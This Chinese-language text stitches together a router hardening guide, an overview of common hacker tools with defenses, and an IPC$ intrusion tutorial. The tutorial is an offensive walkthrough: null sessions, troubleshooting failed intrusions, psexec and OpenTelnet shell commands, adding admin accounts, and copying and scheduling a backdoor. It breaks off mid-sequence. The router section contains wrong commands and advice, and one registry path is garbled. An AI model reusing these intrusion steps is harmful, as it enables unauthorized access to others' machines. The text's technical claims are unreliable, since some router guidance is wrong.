对于大多数企业局域网来说,路由器已经成为正在使用之中的最重要的安全设备之一。一般来说,大多数网络都有一个主要的接入点。这就是通常与专用防火墙一起使用的“边界路由器”。

  经过恰当的设置,边缘路由器能够把几乎所有的最顽固的坏分子挡在网络之外。如果你愿意的话,这种路由器还能够让好人进入网络。不过,没有恰当设置的路由器只是比根本就没有安全措施稍微好一点。

  在下列指南中,我们将研究一下你可 以用来保护网络安全的9个方便的步骤。这些步骤能够保证你拥有一道保护你的网络的砖墙,而不是一个敞开的大门。

  1.修改默认的口令!

  据国外调查显示,80%的安全突破事件是由薄弱的口令引起的。网络上有大多数路由器的广泛的默认口令列表。你可以肯定在某些地方的某个人会知道你的生日。SecurityStats.com网站维护一个详尽的可用/不可用口令列表,以及一个口令的可靠性测试。

  2.关闭IP直接广播(IP Directed Broadcast)

  你的服务器是很听话的。让它做什么它就做什么,而且不管是谁发出的指令。Smurf攻击是一种拒绝服务攻击。在这种攻击中,攻击者使用假冒的源地址向你的网络广播地址发送一个“ICMP echo”请求。这要求所有的主机对这个广播请求做出回应。这种情况至少会降低你的网络性能。

  参考你的路由器信息文件,了解如何关闭IP直接广播。例如,“Central(config)#no ip source-route”这个指令将关闭思科路由器的IP直接广播地址。

  3.如果可能,关闭路由器的HTTP设置

  正如思科的技术说明中简要说明的那样,HTTP使用的身份识别协议相当于向整个网络发送一个未加密的口令。然而,遗憾的是,HTTP协议中没有一个用于验证口令或者一次性口令的有效规定。

  虽然这种未加密的口令对于你从远程位置(例如家里)设置你的路由器也许是非常方便的,但是,你能够做到的事情其他人也照样可以做到。特别是如果你仍在使用默认的口令!如果你必须远程管理路由器,你一定要确保使用SNMPv3以上版本的协议,因为它支持更严格的口令。

  4.封锁ICMP ping请求

  ping的主要目的是识别目前正在使用的主机。因此,ping通常用于更大规模的协同性攻击之前的侦察活动。通过取消远程用户接收ping请求的应答能力,你就更容易避开那些无人注意的扫描活动或者防御那些寻找容易攻击的目标的“脚本小子”(script kiddies)。

  请注意,这样做实际上并不能保护你的网络不受攻击,但是,这将使你不太可能成为一个攻击目标。

  5.关闭IP源路由

  IP协议允许一台主机指定数据包通过你的网络的路由,而不是允许网络组件确定最佳的路径。这个功能的合法的应用是用于诊断连接故障。但是,这种用途很少应用。这项功能最常用的用途是为了侦察目的对你的网络进行镜像,或者用于攻击者在你的专用网络中寻找一个后门。除非指定这项功能只能用于诊断故障,否则应该关闭这个功能。

  6.确定你的数据包过滤的需求

  封锁端口有两项理由。其中之一根据你对安全水平的要求对于你的网络是合适的。

  对于高度安全的网络来说,特别是在存储或者保持秘密数据的时候,通常要求经过允许才可以过滤。在这种规定中,除了网路功能需要的之外,所有的端口和IP地址都必要要封锁。例如,用于web通信的端口80和用于SMTP的110/25端口允许来自指定地址的访问,而所有其它端口和地址都可以关闭。

  大多数网络将通过使用“按拒绝请求实施过滤”的方案享受可以接受的安全水平。当使用这种过滤政策时,可以封锁你的网络没有使用的端口和特洛伊木马或者侦查活动常用的端口来增强你的网络的安全性。例如,封锁139端口和445(TCP和UDP)端口将使黑客更难对你的网络实施穷举攻击。封锁31337(TCP和UDP)端口将使Back Orifice木马程序更难攻击你的网络。

  这项工作应该在网络规划阶段确定,这时候安全水平的要求应该符合网络用户的需求。查看这些端口的列表,了解这些端口正常的用途。

  7.建立准许进入和外出的地址过滤政策

  在你的边界路由器上建立政策以便根据IP地址过滤进出网络的违反安全规定的行为。除了特殊的不同寻常的案例之外,所有试图从你的网络内部访问互联网的IP地址都应该有一个分配给你的局域网的地址。例如,192.168.0.1这个地址也许通过这个路由器访问互联网是合法的。但是,216.239.55.99这个地址很可能是欺骗性的,并且是一场攻击的一部分。

  相反,来自互联网外部的通信的源地址应该不是你的内部网络的一部分。因此,应该封锁入网的192.168.X.X、172.16.X.X和10.X.X.X等地址。

  最后,拥有源地址的通信或者保留的和无法路由的目标地址的所有的通信都应该允许通过这台路由器。这包括回送地址127.0.0.1或者E类(class E)地址段240.0.0.0-254.255.255.255。

  8.保持路由器的物理安全

  从网络嗅探的角度看,路由器比集线器更安全。这是因为路由器根据IP地址智能化地路由数据包,而集线器相所有的节点播出数据。如果连接到那台集线器的一个系统将其网络适配器置于混乱的模式,它们就能够接收和看到所有的广播,包括口令、POP3通信和Web通信。

  然后,重要的是确保物理访问你的网络设备是安全的,以防止未经允许的笔记本电脑等嗅探设备放在你的本地子网中。

  9.花时间审阅安全记录

  审阅你的路由器记录(通过其内置的防火墙功能)是查出安全事件的最有效的方法,无论是查出正在实施的攻击还是未来攻击的征候都非常有效。利用出网的记录,你还能够查出试图建立外部连接的特洛伊木马程序和间谍软件程序。用心的安全管理员在病毒传播者作出反应之前能够查出“红色代码”和“Nimda”病毒的攻击。

  此外,一般来说,路由器位于你的网络的边缘,并且允许你看到进出你的网络全部通信的状况。

  您是怎样看待黑客及黑客现象的?崇拜?不齿?还是畏惧?本文将向您介绍中国黑客常用的八种工具及其防御方法。需要说明的是,这些只是初级黑客、甚至是不算黑客的“黑客”所使用的工具。在真正的黑客看来这些工具是很初级的,但这些黑客工具对我们普通用户的杀伤力却是非常大的,因此有必要介绍一下它们的特点及防御方法。

  本文列出了几种有代表性的黑客工具,我们真正要掌握的当然不是如何使用这些黑客工具,而是通过它们了解黑客攻击手段,掌握防范黑客攻击的方法,堵住可能出现的各种漏洞。  

  冰河  

  冰河是最优秀的国产木马程序之一,同时也是被使用最多的一种木马 。说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的PCanywhere,但可惜的是,它最终变成了黑客常用的工具。  

  冰河的服务器端(被控端)和客户端(控制端)都是一个可执行文件,客户端的图标是一把瑞士军刀,服务器端则看起来是个没什么大不了的微不足道的程序,但就是这个程序,足以让你的电脑成为别人的掌中之物。某台电脑执行了服务器端软件后,该电脑的7626端口(默认)就对外开放了,如果在客户端输入这台电脑的IP地址,就能完全控制这台电脑。由于个人电脑每次上网的IP地址都是随机分配的,所以客户端软件有一个“自动搜索”功能,可以自动扫描某个IP段受感染的电脑,一旦找到,这台电脑就尽在黑客的掌握之中了。由于冰河程序传播比较广泛,所以一般情况下,几分钟之内就能找到一个感染了冰河的受害者。  

  防御措施:首先不要轻易运行来历不明的软件,只要服务器端不被运行,冰河再厉害也是有力使不出,这一点非常重要;其次由于冰河的广泛流行,使得大多数杀毒软件可以查杀冰河,因此在运行一个新软件之前用杀毒软件查查是很必要的。但由于该软件变种很多,杀毒软件如果不及时升级,难免会有遗漏,因此要保证您使用的杀毒软件病毒库保持最新。用查杀木马软件如木马克星之类的也可以;安装并运行防火墙,如此则能相对安全一些。  

  Wnuke  

  Wnuke可以利用Windows系统的漏洞, 通过TCP/IP协议向远程机器发送一段信息,导致一个OOB错误,使之崩溃。现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按ESC键后又回到原来的状态,或者死机。它可以攻击WIN9X、WINNT、WIN2000等系统,并且可以自由设置包的大小和个数,通过连续攻击导致对方死机。  

  防御措施:不要轻易点击别人在论坛或聊天室告诉您的网址,那很可能是探测您的IP地址的(如Iphunter就可以做到这一点);用写字板或其它的编辑软件建立一个文本文件,文件名为OOBFIX.REG,内容如下:

  REGEDIT4

  [HKEY_LOCAL_MACHINESystemCurrentControlSet ServicesVxDMSTCP]

  ″BSDUrgent″=″0″

  启动资源管理器,双击该文件即可;安装并运行防火墙。

  Shed 

  Shed是基于NetBIOS的攻击Windows的软件。NetBIOS(Network Basic Input Output System,网络基本输入输出系统),是一种应用程序接口(API),作用是为局域网(LAN)添加特殊功能,几乎所有的局域网电脑都是在NetBIOS基础上工作的。在我们的Windows 95、99、或Me中,NetBIOS是和TCP/IP捆绑在一起的,这是十分危险的!但当我们安装TCP/IP协议时,默认情况下NetBIOS和它的文件与打印共享功能也一起被装进了系统。当NetBIOS运行时,你的后门打开了:因为NetBIOS不光允许局域网内的用户访问你的硬盘资源,Internet上的黑客也能!Shed正是利用了这一点。

  防御措施:

  1) 检查NetBEUI是否出现在配置栏中。打开控制面版,双击“网络”选项,打开“网络”对话框。在“配置”标签页中检查己安装的网络组件中是否有NetBEUI。如果没有,点击列表下边的添加按钮,选中“网络协议”对话框,在制造商列表中选择微软,在网络协议列表中选择NetBEUI。点击确定,根据提示插入安装盘,安装NetBEUI。

  2) 回到“网络”对话框,选中“拨号网络适配器”,点击列表右下方“属性”按钮。在打开的“属性”对话框中选择“绑定”标签页,将除“TCP/IP->网络适配器”之外的其它项目前复选框中的对勾都取消!

  3) 回到“网络”对话框,选中“TCP/IP->拨号网络适配器”点击列表右下方“属性”按钮,不要怕弹出的警告对话框,点击“确定”。在“TCP/IP属性”对话框中选择“绑定”标签页,将列表中所有项目前复选框中的对勾都取消!点击“确定”,这时Windows会警告你“尚未选择绑定的驱动器。现在是否选择驱动器?”点击“否”。之后,系统会提示重新启动计算机,确认。

  4) 重新进入“TCP/IP->拨号网络适配器”的“TCP/IP属性”对话框,选定“NetBIOS”标签页,看到“通过TCP/IP启用NetBIOS”项被清除了吧!连点两次“取消”退出“网络”对话框(不要点“确认”,免得出现什么意外)。

  Superscan是一个功能强大的扫描器,速度奇快,探测台湾全部回应值小于200MS的IP段仅用6个小时。可以查看本机IP地址和域名,扫描一个IP段的所有在线主机以及其可探测到的端口号。而且可以保存和导入所有已探测的信息。

  防御措施:及时打补丁堵住漏洞。微软的那些没完没了的补丁包是有用的,很多时候,这些补丁能有效堵住漏洞使我们的系统更安全一些。尽管补丁包出现总会晚于漏洞的出现,但作为亡羊补牢的措施还是有必要的。

  ExeBind  

  ExeBind可以将指定的黑客程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序(黑客程序)也在后台被执行。当您再次上网时,您已经在不知不觉中被控制住了。您说这个文件捆绑专家恐怖不?而且它支持多重捆绑。实际上是通过多次分割文件,多次从父进程中调用子进程来实现的。现象:几乎无。危害:NetSpy、HDFILL、BO 2000常通过这种形式在Internet上寄生传播。如果有一天您收到一个不相识的人发来的不错的程序,请仔细检查一下,因为没准它是用ExeBind捆绑了木马程序!  

  防御措施:不要执行来历不明的软件,不要从不可靠的小站点上下载软件,任何新下载的程序在首次运行前,都要用最新的杀毒软件和查杀木马软件检查后才能使用。另外,最好能知道一些常用软件的文件大小,一旦发现文件大小有变化尤其是有明显增大表现,这时就该请出我们的杀毒软件和查杀木马软件了。HackerScan就可以查出这个软件,邮箱终结者类似的邮箱炸弹很多,它们的原理基本一致,最根本的目标就是涨破您的邮箱,使您无法正常收发E-mail。  

  防御措施:要注意自己的网上言行,不要得罪人;不要轻易留下您的E-mail信箱地址,特别是较重要的E-mail信箱更不能随意让别人知道,以免给“有心人”机会;申请较大的邮箱(如中华网88M,新浪网50M),然后启用邮箱过滤功能,一般的网站都有这种服务。对付这类炸弹只能如此消极防御了,谁有更好的办法说出来大家学学?  

  流光  

  流光这是国人小榕的作品,当我首次使用这个软件时,我被它深深地震住了。这个软件能让一个刚刚会用鼠标的人成为专业级黑客,它可以探测POP3、FTP、HTTP、PROXY、FORM、SQL、SMTP、IPC$ 上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码。流光对WIN9X、WINNT、WIN2000上的漏洞都可以探测,使它成为许多黑客手中的必备工具之一,一些资深黑客也对它青睐有加。  

  防御措施:由于它综合了多种扫描探测方式,所以很难防备,对付它必须及时打好各种补丁,同时还要使用防火墙。防火墙推荐使用国产个人防火墙——天网,下载地址:http://sky.net.cn。天网是非常好的防火墙软件,可以有效阻挡各种攻击,有非常灵活的规则设置。规则?什么是规则?跟您直说了吧,规则是一系列的比较条件和一个对数据包的动作,就是根据数据包的每一个部分来与设置的条件比较,当符合条件时,就可以确定对该包放行或者阻挡。明白了吧?通过合理的设置规则就可以把有害的数据包挡在你的机器之外。如果您不熟悉网络,最好不要调整它,您可以直接使用天网帮您设计的规则。如果您熟悉网络,就可以非常灵活的设计合适自己使用的规则。虽然天网有些过于敏感,经常对一些正常的文件传送报警,但这并不妨碍这个软件成为优秀的防火墙软件。天网免费注册,即使不注册也不影响使用。

  溯雪  

  溯雪还是小榕的作品。该软件利用asp、cgi对免费信箱、论坛、聊天室进行密码探测的软件。密码探测主要是通过猜测生日的方法来实现,成功率可达60%-70%。溯雪的运行原理是通过提取asp、cgi页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码。用溯雪来探测信箱密码真的是很容易,由于许多人对密码的设置采用了自己的生日或常用英文单词等较简单的方式,这给溯雪留下了很大的施展空间。我曾用自己的信箱做过试验,采用生日作为密码,溯雪只用了不到3分钟就成功的破解出了我的密码!要知道我用的字典很大,若字典再小些,会更快的!  

  防御措施:首先不要轻易暴露自己的信箱地址和论坛、聊天室的用户名,以免引起“有心人”注意;其次把您的密码设置复杂一些,不要设置成纯数字或纯字母,更不能少于7位,否则真的很危险。可以将密码设置成数字与字母相结合型,并且长度大于7位以上,如设置为这种样式:g19o79o09d19。这个密码是英文单词good和生日1979019的组合,记忆容易,长度又很长,是很难破解的;再次要经常更换密码,一个密码使用时间不能太长;最后一点,最好各个信箱密码都不同,以免被人一破百破。

IPC$命令

一 摘要
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$所使用的端口
六 ipc管道在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 关于at命令和xp对ipc$的限制
十 如何打开目标的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能会用到的命令
十三 对比过去和现今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵问答精选

一 摘要
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列。

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录 winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?

三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?

四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:

1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use \ipipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。

2 查看远程主机的共享资源
命令:net view \ip
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。

在 \*.*.*.*的共享资源
资源共享名 类型 用途 注释

———————————————————–
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看远程主机的当前时间
命令: net time \ip
解释:用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER……<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?

五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。

有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:

对于win2000客户端(发起端)来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。

对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
2 如果禁止NBT,那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。

六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。

七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:

1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;

2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;

3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;

4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;

5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);

6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;

7 连接发起方未打开139,445端口;

8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于‘无法更新密码‘这样的错误提示(显然空会话排除这种错误);

9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;

10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。

另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?

1 对方未开启共享文件夹
这类错误出现的最多,占到50%以上。许多朋友在ipc$连接建立成功后,甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \IP这个命令看一下你想要复制的共享文件夹是否存在(用软件查看当然更好),不要认为能建立ipc$连接就一定有共享文件夹存在。

2 向默认共享复制失败
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向c$,d$,admin $之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,并不能说明默认共享一定存在。 ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享却是实实在在的共享文件夹;

2)由于net view \IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)

要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们自己开启的可以设置权限的共享文件夹。

3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;
2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators组成员才可以,在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录;
3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

注意:
1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的
2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理员可以对普通的共享文件夹进行访问权限设置,如图6,管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D$的默认共享,那么你却可以访问D$,从而绕过了权限限制,有兴趣的朋友可以自己做测试。

4被防火墙杀死或在局域网
还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。

呵呵,大家也知道,ipc$连接在实际操作过程中会出现各种各样的问题,上面我所总结的只是一些常见错误,没说到的,大家可以给我提个醒儿。

九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用 psexec.exe远程运行程序,假设想要远程机器执行本地c:xinxin.exe文件,且管理员为administrator,密码为1234,那么输入下面的命令:
psexec \ip -u administrator -p 1234 -c c:xinxin.exe
如果已经建立ipc连接,则-u -p这两个参数不需要,psexec.exe将自动拷贝文件到远程机器并运行。

本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在xp的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码,我建议你尽量避开ipc管道。

十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马,cmd重定向等,然后在shell下执行:
net share ipc$
开放目标的ipc$共享;
net share ipc$ /del
关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用:
net share xinxin=c:
这样就把它的c盘开为共享名为xinxin共享文件夹了。(可是我发现很多人错误的认为开共享文件夹的命令是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在shell下才能实现的。

十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;

2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。

十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。

1 建立/删除ipc$连接的命令

1)建立空连接:
net use \127.0.0.1ipc$ "" /user:""

2)建立非空连接:
net use \127.0.0.1ipc$ "密码" /user:"用户名"

3)删除连接:
net use \127.0.0.1ipc$ /del

2 在ipc$连接中对远程主机的操作命令

1) 查看远程主机的共享资源(看不到默认共享):
net view \127.0.0.1

2) 查看远程主机的当前时间:
net time \127.0.0.1

3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1

4)映射/删除远程共享:
net use z: \127.0.0.1c
此命令将共享名为c的共享资源映射为本地z盘

net use z: /del
删除映射的z盘,其他盘类推

5)向远程主机复制文件:
copy 路径文件名 \IP共享目录名,如:
copy c:xinxin.exe \127.0.0.1c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \127.0.0.1c$xinxin.exe c:

6)远程添加计划任务:
at \IP 时间 程序名 如:
at \127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径

3 本地命令

1)查看本地主机的共享资源(可以看到本地的默认共享)
net share

2)得到本地主机的用户列表
net user

3)显示本地某用户的帐户信息
net user 帐户名

4)显示本地主机当前启动的服务
net start

5)启动/关闭本地服务
net start 服务名
net stop 服务名

6)在本地添加帐户
net user 帐户名 密码 /add

7)激活禁用的用户
net uesr 帐户名 /active:yes

8)加入管理员组
net localgroup administrators 帐户名 /add

很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。

4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23

2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe \ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe \127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效

3)用psexec.exe一步获得shell,需要ipc管道支持
psexec.exe \IP -u 管理员帐号 -p 密码 cmd
psexec.exe \127.0.0.1 -u administrator -p "" cmd

十三 对比过去和现今的ipc$入侵
既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:

[1]
C:>net use \127.0.0.1ipc$ "" /user:admintitrators
\用扫到的空口令建立连接  

[2]
c:>net view \127.0.0.1
\查看远程的共享资源

[3]
C:>copy srv.exe \127.0.0.1admin$system32
\将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启  

[4]
C:>net time \127.0.0.1
\查看远程主机的当前时间

[5]
C:>at \127.0.0.1 时间 srv.exe
